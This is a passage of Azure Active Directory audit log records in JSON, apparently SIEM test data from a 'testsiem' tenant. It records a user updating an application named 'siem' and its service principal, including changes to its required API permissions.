"##957dae7d-5f0a-4e82-a428-61c0dba2878b_00000000-0000-0000-0000-000000000000_957dae7d-5f0a-4e82-a428-61c0dba2878b"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR565"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Update application.", "Id": "fe115c66-3e08-4ab4-8a00-84ae25a59078"} -{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T15:34:52", "Actor": 
[{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Type": 2, "ID": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "siem"}, {"Type": 2, "ID": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Type": 4, "ID": "71a0194b-b70c-44a6-82f2-d4670aee4585"}], "ObjectId": "71a0194b-b70c-44a6-82f2-d4670aee4585", "ModifiedProperties": [{"Name": "Included Updated Properties", "OldValue": "", "NewValue": ""}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, 
{"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "targetName", "Value": "siem"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "5345f95e-44e0-48fc-823c-8206ff821338"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T15:34:52.6473040Z"}, {"Name": "env_epoch", "Value": "FQXLK"}, {"Name": "env_seqNum", "Value": "42492835"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##957dae7d-5f0a-4e82-a428-61c0dba2878b_00000000-0000-0000-0000-000000000000_957dae7d-5f0a-4e82-a428-61c0dba2878b"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR565"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Update service principal.", "Id": "76f9b173-c35c-4dbb-b5f7-64750ae994ce"} -{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T18:25:54", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 
2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "Application_08d8bb01-c269-4a92-9929-a1a89b729512"}, {"Type": 2, "ID": "08d8bb01-c269-4a92-9929-a1a89b729512"}, {"Type": 2, "ID": "Application"}, {"Type": 1, "ID": "siem"}], "ObjectId": "Not Available", "ModifiedProperties": [{"Name": "RequiredResourceAccess", "OldValue": "[\r\n {\r\n \"ResourceAppId\": \"00000003-0000-0000-c000-000000000000\",\r\n \"RequiredAppPermissions\": [\r\n {\r\n \"EntitlementId\": \"e1fe6dd8-ba31-4d61-89e7-88639da4683d\",\r\n \"DirectAccessGrant\": false,\r\n \"ImpersonationAccessGrants\": [\r\n 20\r\n ]\r\n }\r\n ],\r\n \"EncodingVersion\": 1\r\n },\r\n {\r\n \"ResourceAppId\": \"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\r\n \"RequiredAppPermissions\": [\r\n {\r\n \"EntitlementId\": \"e2cea78f-e743-4d8f-a16a-75b629a038ae\",\r\n \"DirectAccessGrant\": true,\r\n \"ImpersonationAccessGrants\": []\r\n }\r\n ],\r\n \"EncodingVersion\": 1\r\n }\r\n]", "NewValue": "[\r\n {\r\n \"ResourceAppId\": \"00000003-0000-0000-c000-000000000000\",\r\n \"RequiredAppPermissions\": [\r\n {\r\n \"EntitlementId\": \"e1fe6dd8-ba31-4d61-89e7-88639da4683d\",\r\n \"DirectAccessGrant\": false,\r\n \"ImpersonationAccessGrants\": [\r\n 20\r\n ]\r\n }\r\n ],\r\n \"EncodingVersion\": 1\r\n },\r\n {\r\n \"ResourceAppId\": \"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\r\n \"RequiredAppPermissions\": [\r\n {\r\n \"EntitlementId\": \"594c1fb6-4f81-4475-ae41-0c394909246c\",\r\n \"DirectAccessGrant\": true,\r\n 
\"ImpersonationAccessGrants\": []\r\n },\r\n {\r\n \"EntitlementId\": \"4807a72c-ad38-4250-94c9-4eabfe26cd55\",\r\n \"DirectAccessGrant\": true,\r\n \"ImpersonationAccessGrants\": []\r\n },\r\n {\r\n \"EntitlementId\": \"e2cea78f-e743-4d8f-a16a-75b629a038ae\",\r\n \"DirectAccessGrant\": true,\r\n \"ImpersonationAccessGrants\": []\r\n }\r\n ],\r\n \"EncodingVersion\": 1\r\n }\r\n]"}, {"Name": "Included Updated Properties", "OldValue": "", "NewValue": "RequiredResourceAccess"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "08d8bb01-c269-4a92-9929-a1a89b729512"}, {"Name": "extendedAuditEventCategory", "Value": "Application"}, {"Name": "targetName", "Value": "siem"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"RequiredResourceAccess\"]"}, {"Name": "correlationId", "Value": "51e48c97-80b1-42bb-b732-8b578dfac528"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T18:25:54.7174137Z"}, {"Name": "env_epoch", "Value": "73AB6"}, {"Name": "env_seqNum", "Value": "43793182"}, {"Name": "env_popSample", 
"Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##a3a48e48-9c2c-4655-9862-13069eb7726c_00000000-0000-0000-0000-000000000000_a3a48e48-9c2c-4655-9862-13069eb7726c"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR575"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Update application.", "Id": "d6ad8dba-dd88-499e-a1e1-e649bf8eeb71"} -{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T18:25:54", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "Application_08d8bb01-c269-4a92-9929-a1a89b729512"}, {"Type": 2, "ID": "08d8bb01-c269-4a92-9929-a1a89b729512"}, {"Type": 2, "ID": "Application"}, {"Type": 1, "ID": "siem"}], "ObjectId": "Not Available", "ModifiedProperties": [{"Name": "RequiredResourceAccess", "OldValue": 
"[\r\n {\r\n \"ResourceAppId\": \"00000003-0000-0000-c000-000000000000\",\r\n \"RequiredAppPermissions\": [\r\n {\r\n \"EntitlementId\": \"e1fe6dd8-ba31-4d61-89e7-88639da4683d\",\r\n \"DirectAccessGrant\": false,\r\n \"ImpersonationAccessGrants\": [\r\n 20\r\n ]\r\n }\r\n ],\r\n \"EncodingVersion\": 1\r\n },\r\n {\r\n \"ResourceAppId\": \"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\r\n \"RequiredAppPermissions\": [\r\n {\r\n \"EntitlementId\": \"e2cea78f-e743-4d8f-a16a-75b629a038ae\",\r\n \"DirectAccessGrant\": true,\r\n \"ImpersonationAccessGrants\": []\r\n }\r\n ],\r\n \"EncodingVersion\": 1\r\n }\r\n]", "NewValue": "[\r\n {\r\n \"ResourceAppId\": \"00000003-0000-0000-c000-000000000000\",\r\n \"RequiredAppPermissions\": [\r\n {\r\n \"EntitlementId\": \"e1fe6dd8-ba31-4d61-89e7-88639da4683d\",\r\n \"DirectAccessGrant\": false,\r\n \"ImpersonationAccessGrants\": [\r\n 20\r\n ]\r\n }\r\n ],\r\n \"EncodingVersion\": 1\r\n },\r\n {\r\n \"ResourceAppId\": \"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\r\n \"RequiredAppPermissions\": [\r\n {\r\n \"EntitlementId\": \"594c1fb6-4f81-4475-ae41-0c394909246c\",\r\n \"DirectAccessGrant\": true,\r\n \"ImpersonationAccessGrants\": []\r\n },\r\n {\r\n \"EntitlementId\": \"4807a72c-ad38-4250-94c9-4eabfe26cd55\",\r\n \"DirectAccessGrant\": true,\r\n \"ImpersonationAccessGrants\": []\r\n },\r\n {\r\n \"EntitlementId\": \"e2cea78f-e743-4d8f-a16a-75b629a038ae\",\r\n \"DirectAccessGrant\": true,\r\n \"ImpersonationAccessGrants\": []\r\n }\r\n ],\r\n \"EncodingVersion\": 1\r\n }\r\n]"}, {"NewValue": "RequiredResourceAccess", "OldValue": "", "Name": "Included Updated Properties"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": 
"18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "08d8bb01-c269-4a92-9929-a1a89b729512"}, {"Name": "extendedAuditEventCategory", "Value": "Application"}, {"Name": "targetName", "Value": "siem"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"RequiredResourceAccess\"]"}, {"Name": "correlationId", "Value": "51e48c97-80b1-42bb-b732-8b578dfac528"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T18:25:54.7174137Z"}, {"Name": "env_epoch", "Value": "73AB6"}, {"Name": "env_seqNum", "Value": "43793182"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##a3a48e48-9c2c-4655-9862-13069eb7726c_00000000-0000-0000-0000-000000000000_a3a48e48-9c2c-4655-9862-13069eb7726c"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR575"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": 
"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Update application.", "Id": "d6ad8dba-dd88-499e-a1e1-e649bf8eeb71"} -{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T18:25:54", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "Application_08d8bb01-c269-4a92-9929-a1a89b729512"}, {"Type": 2, "ID": "08d8bb01-c269-4a92-9929-a1a89b729512"}, {"Type": 2, "ID": "Application"}, {"Type": 1, "ID": "siem"}], "ObjectId": "Not Available", "ModifiedProperties": [{"NewValue": "[\r\n {\r\n \"ResourceAppId\": \"00000003-0000-0000-c000-000000000000\",\r\n \"RequiredAppPermissions\": [\r\n {\r\n \"EntitlementId\": \"e1fe6dd8-ba31-4d61-89e7-88639da4683d\",\r\n \"DirectAccessGrant\": false,\r\n \"ImpersonationAccessGrants\": [\r\n 20\r\n ]\r\n }\r\n ],\r\n \"EncodingVersion\": 1\r\n },\r\n {\r\n \"ResourceAppId\": \"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\r\n \"RequiredAppPermissions\": [\r\n {\r\n \"EntitlementId\": \"594c1fb6-4f81-4475-ae41-0c394909246c\",\r\n \"DirectAccessGrant\": true,\r\n \"ImpersonationAccessGrants\": []\r\n },\r\n {\r\n \"EntitlementId\": \"4807a72c-ad38-4250-94c9-4eabfe26cd55\",\r\n \"DirectAccessGrant\": true,\r\n \"ImpersonationAccessGrants\": []\r\n },\r\n {\r\n \"EntitlementId\": \"e2cea78f-e743-4d8f-a16a-75b629a038ae\",\r\n \"DirectAccessGrant\": true,\r\n 
\"ImpersonationAccessGrants\": []\r\n }\r\n ],\r\n \"EncodingVersion\": 1\r\n }\r\n]", "OldValue": "[\r\n {\r\n \"ResourceAppId\": \"00000003-0000-0000-c000-000000000000\",\r\n \"RequiredAppPermissions\": [\r\n {\r\n \"EntitlementId\": \"e1fe6dd8-ba31-4d61-89e7-88639da4683d\",\r\n \"DirectAccessGrant\": false,\r\n \"ImpersonationAccessGrants\": [\r\n 20\r\n ]\r\n }\r\n ],\r\n \"EncodingVersion\": 1\r\n },\r\n {\r\n \"ResourceAppId\": \"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\r\n \"RequiredAppPermissions\": [\r\n {\r\n \"EntitlementId\": \"e2cea78f-e743-4d8f-a16a-75b629a038ae\",\r\n \"DirectAccessGrant\": true,\r\n \"ImpersonationAccessGrants\": []\r\n }\r\n ],\r\n \"EncodingVersion\": 1\r\n }\r\n]", "Name": "RequiredResourceAccess"}, {"Name": "Included Updated Properties", "OldValue": "", "NewValue": "RequiredResourceAccess"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "08d8bb01-c269-4a92-9929-a1a89b729512"}, {"Name": "extendedAuditEventCategory", "Value": "Application"}, {"Name": "targetName", "Value": "siem"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"RequiredResourceAccess\"]"}, {"Name": "correlationId", "Value": "51e48c97-80b1-42bb-b732-8b578dfac528"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", 
"Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T18:25:54.7174137Z"}, {"Name": "env_epoch", "Value": "73AB6"}, {"Name": "env_seqNum", "Value": "43793182"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##a3a48e48-9c2c-4655-9862-13069eb7726c_00000000-0000-0000-0000-000000000000_a3a48e48-9c2c-4655-9862-13069eb7726c"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR575"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Update application.", "Id": "d6ad8dba-dd88-499e-a1e1-e649bf8eeb71"} -{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T18:25:54", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", 
"SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Type": 2, "ID": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "siem"}, {"Type": 2, "ID": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Type": 4, "ID": "71a0194b-b70c-44a6-82f2-d4670aee4585"}], "ObjectId": "71a0194b-b70c-44a6-82f2-d4670aee4585", "ModifiedProperties": [{"Name": "Included Updated Properties", "OldValue": "", "NewValue": ""}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "targetName", "Value": "siem"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "51e48c97-80b1-42bb-b732-8b578dfac528"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, 
{"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T18:25:54.7823970Z"}, {"Name": "env_epoch", "Value": "73AB6"}, {"Name": "env_seqNum", "Value": "43793206"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##a3a48e48-9c2c-4655-9862-13069eb7726c_00000000-0000-0000-0000-000000000000_a3a48e48-9c2c-4655-9862-13069eb7726c"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR575"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Update service principal.", "Id": "606ae654-e71e-4a6b-a07c-85acd775667b"} -{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T18:26:05", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": 
